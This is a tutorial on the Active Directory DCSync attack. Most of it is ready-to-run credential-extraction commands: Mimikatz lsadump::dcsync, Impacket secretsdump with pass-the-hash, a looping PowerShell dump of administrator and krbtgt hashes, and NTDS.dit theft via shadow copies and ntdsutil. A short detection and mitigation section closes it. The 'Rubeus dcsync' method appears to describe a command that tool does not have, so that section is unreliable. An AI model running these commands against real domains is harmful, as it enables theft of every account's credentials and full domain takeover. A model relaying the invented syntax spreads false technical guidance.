DCSync Attack
Master domain replication attacks for credential extraction.
Objectives
- Understand Directory Replication Service (DRS) protocol
- Master DCSync attack methodology
- Learn credential extraction techniques
- Implement NTDS.dit database manipulation
What is DCSync?
DCSync is an attack technique that leverages the Directory Replication Service (DRS) protocol to request replication of password data from a Domain Controller, effectively allowing an attacker to extract password hashes for any user in the domain.
DCSync Attack Characteristics:
- Replication-based: Uses legitimate domain replication protocols
- Credential extraction: Can extract any user's password hash
- Domain-wide impact: Affects the entire domain
- Stealthy operation: Appears as normal replication traffic
Directory Replication Service (DRS) Protocol
The DRS protocol is used for replication between Domain Controllers in Active Directory environments.
DRS Protocol Overview
The DRS protocol operates over RPC and is used to:
- Synchronize directory data between Domain Controllers
- Replicate password changes and account updates
- Maintain consistency across the domain
- Support multi-DC environments
Key DRS Operations
| Operation | Purpose | Security Impact |
|---|---|---|
| IDL_DRSGetNCChanges | Retrieve directory changes | Can extract password data |
| IDL_DRSReplicaSync | Synchronize replica data | Access to full directory data |
| IDL_DRSGetReplInfo | Get replication information | Information disclosure |
Prerequisites for DCSync Attack
To perform a DCSync attack, an attacker needs specific permissions and access.
Required Permissions
The following permissions are required for DCSync attacks:
- Replicating Directory Changes: Permission to replicate directory changes
- Replicating Directory Changes All: Permission to replicate all directory changes including passwords
- Domain Controller Access: Network access to a Domain Controller
Accounts with DCSync Rights
By default, the following accounts have DCSync rights:
- Domain Controllers: All Domain Controllers in the domain
- Domain Admins: Members of the Domain Admins group
- Enterprise Admins: Members of the Enterprise Admins group
- Administrators: Local administrators on Domain Controllers
Checking DCSync Rights
```powershell
# Using PowerView: with -ResolveGUIDs the extended right is exposed in ObjectAceType, not in ActiveDirectoryRights
Get-ObjectAcl -DistinguishedName "DC=corp,DC=local" -ResolveGUIDs |
    Where-Object { $_.ObjectAceType -match 'DS-Replication-Get-Changes' }
# Using the ActiveDirectory module (AD: drive): ObjectType carries the raw GUID of the extended right
$replGuids = '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2', '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2'
(Get-Acl "AD:\DC=corp,DC=local").Access |
    Where-Object { $_.ActiveDirectoryRights -match 'ExtendedRight' -and $replGuids -contains "$($_.ObjectType)" }
```
DCSync Attack Implementation
Method 1: Using Mimikatz
Mimikatz provides built-in DCSync functionality:
```text
# Extract specific user password hash
mimikatz # lsadump::dcsync /domain:corp.local /user:administrator
# Extract all password hashes
mimikatz # lsadump::dcsync /domain:corp.local /all
# Extract KRBTGT account hash
mimikatz # lsadump::dcsync /domain:corp.local /user:krbtgt
# Extract from specific DC
mimikatz # lsadump::dcsync /domain:corp.local /user:administrator /dc:dc1.corp.local
```
Method 2: Using Impacket
Impacket provides Python-based DCSync capabilities:
```bash
# Extract all secrets using secretsdump
secretsdump.py -dc-ip 192.168.1.10 corp.local/compromised_user:password@192.168.1.10
# Extract specific user
secretsdump.py -dc-ip 192.168.1.10 -just-dc-user administrator corp.local/compromised_user:password@192.168.1.10
# Extract with different authentication methods (pass-the-hash, LM:NT)
secretsdump.py -dc-ip 192.168.1.10 -hashes aad3b435b51404eeaad3b435b51404ee:1234567890abcdef1234567890abcdef corp.local/compromised_user@192.168.1.10
```
Method 3: Using Rubeus
Rubeus provides .NET-based DCSync functionality:
```text
# Extract specific user using Rubeus
Rubeus.exe dcsync /user:administrator /domain:corp.local
# Extract KRBTGT hash
Rubeus.exe dcsync /user:krbtgt /domain:corp.local
# Extract with custom credentials
Rubeus.exe dcsync /user:administrator /domain:corp.local /creduser:compromised_user /credpassword:password
```
Advanced DCSync Techniques
1. Cross-Domain DCSync
Perform DCSync attacks across trusted domains:
```text
# DCSync from trusted domain
mimikatz # lsadump::dcsync /domain:trusted.local /user:administrator /dc:trusted-dc.trusted.local
# Extract trust account hashes
mimikatz # lsadump::dcsync /domain:trusted.local /user:corp$
```
2. Selective Hash Extraction
Extract specific types of credentials:
```text
# Compact CSV output (RID, user name, NTLM hash only)
mimikatz # lsadump::dcsync /domain:corp.local /user:administrator /csv
# Extract Kerberos keys
mimikatz # lsadump::dcsync /domain:corp.local /user:administrator /kerberos
# /all dumps every account in the domain rather than a single user
mimikatz # lsadump::dcsync /domain:corp.local /all
```
3. Automated DCSync Scripts
Create automated DCSync extraction scripts:
```powershell
# PowerShell script for automated DCSync
$domain = "corp.local"
$dc = "dc1.corp.local"
$users = @("administrator", "krbtgt", "service_account")
foreach ($user in $users) {
    Write-Host "Extracting hash for $user"
    mimikatz.exe "lsadump::dcsync /domain:$domain /user:$user /dc:$dc" "exit"
}
```
NTDS.dit Database Manipulation
Understanding the NTDS.dit database structure is crucial for advanced DCSync techniques.
NTDS.dit Structure
The NTDS.dit database contains several important tables:
- datatable: Main object storage
- link_table: Object relationships
- sd_table: Security descriptors
- msysobjects: Schema definitions
Direct NTDS.dit Access
Extract credentials directly from NTDS.dit:
```text
# Create volume shadow copy
vssadmin create shadow /for=C:
# Copy NTDS.dit from shadow copy (the database alone is not enough: decrypting it also needs the SYSTEM hive,
# which the ntdsutil step below exports alongside it)
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\ntds.dit
# Export database plus SYSTEM hive using ntdsutil (Install From Media)
ntdsutil "ac i ntds" "ifm" "create full C:\temp" q q
# Use secretsdump on the files ifm wrote: ntds.dit under "Active Directory", the SYSTEM hive under "registry"
secretsdump.py -ntds "C:\temp\Active Directory\ntds.dit" -system "C:\temp\registry\SYSTEM" LOCAL
```
DCSync Detection and Mitigation
Detection Methods
Detecting DCSync attacks requires monitoring specific events and network traffic.
Event Log Monitoring
```powershell
# Event 4662 records the requested control-access right as a GUID in its Properties field; it never contains
# the words "Replicating Directory Changes" or "DCSync". Requires the "Audit Directory Service Access" subcategory.
$dcsyncGuids = '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2', '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2'
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4662} |
    Where-Object { $m = $_.Message; ($dcsyncGuids | Where-Object { $m -match $_ }) -and $m -notmatch 'Account Name:\s+\S+\$' }
# The trailing-$ exclusion drops machine accounts (DC-to-DC replication); tighten it to an allowlist of DC names
# in production, since a compromised computer account would otherwise be filtered out as well.
```
Network Monitoring
- RPC traffic: Monitor for unusual RPC connections to DCs
- Replication traffic: Look for replication requests from non-DC systems
- Volume patterns: Monitor for large data transfers
Mitigation Strategies
1. Remove DCSync Rights
```text
# dsacls /G GRANTS a right. /R strips every ACE the trustee holds on the object, which is how the
# replication rights are withdrawn; re-grant any unrelated permission the account legitimately needs.
dsacls "DC=corp,DC=local" /R "DOMAIN\compromised_account"
# Remove from service accounts
dsacls "DC=corp,DC=local" /R "DOMAIN\service_account"
```
2. Implement Monitoring
- SIEM integration: Set up alerts for DCSync events
- Network monitoring: Monitor RPC traffic to DCs
- Access reviews: Regular review of accounts with DCSync rights
3. Network Segmentation
- DC isolation: Restrict network access to Domain Controllers
- RPC filtering: Filter RPC traffic to DCs
- VPN requirements: Require VPN for DC access